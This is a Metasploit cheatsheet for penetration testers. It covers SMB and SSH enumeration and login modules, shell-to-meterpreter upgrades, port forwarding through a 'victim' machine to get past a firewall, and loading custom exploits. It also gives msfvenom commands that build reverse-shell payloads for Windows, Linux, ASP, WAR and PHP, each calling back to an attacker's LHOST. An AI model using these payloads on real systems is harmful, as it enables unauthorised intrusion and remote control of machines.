Metasploit Cheatsheet

Metasploit Initialisation

service postgresql start
msfdb init
msfconsole

To verify database connectivity:

msf > db_status

Auxiliary modules

To discover netbios hostnames:

use auxiliary/scanner/netbios/nbname

SMB enumeration:

use auxiliary/scanner/smb/smb_enumshares - enumerates any SMB shares that are available on a remote system

use auxiliary/scanner/smb/smb_enumusers - connecting to each system via the SMB RPC and enumerate the users on the system

use auxiliary/scanner/smb/smb_login - attempt to login via SMB

use auxiliary/scanner/smb/smb_version - determines the version of the SMB service that is running

SSH users enumeration:

use auxiliary/scanner/ssh/ssh_enumusers - checks if user exists or can connect via SSH

Post modules

Upgrade to meterpreter

use post/multi/manage/shell_to_meterpreter

Port Forward

For example we have meterpreter session on Windows machine and there is something listening on port 9090, which we can’t see from outside (because of firewall or smth). We need to bypass firewall and to connect to port 9090 on Windows machine. So:

portfwd add -l <local port on our KALI machine> -p <port on victim (in our case Windows) machine> -r <victim IP address>
portfwd add -l 1234 -p 9090 -r 10.10.10.1

If service is listening on locahost only:

portfwd add -l 1234 -p 9090 -r 127.0.0.1

-l - local port on our Kali machine -p - victim port we want to access -r - victim IP address add - this option will add this route

to delete portfwd rules:
portfwd flush

Add custom module

Create folder for exploit:

mkdir -p $HOME/.msf4/modules/exploits/test

Place exploit in created folder. After that open msfconsole and:

msf > reload_all

To use recently added exploit:

use exploit/test/*exploit_file*

msfvenom example payloads

source

List payloads

msfvenom -l

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port to listen> -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port to listen> -f elf > shell.elf

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<your port to listen> -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip> LPORT=<your port to listen> -f war > shell.war

PHP

msfvenom -p php/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<your port to listen> -e php/base64 -f raw > meterpreter.php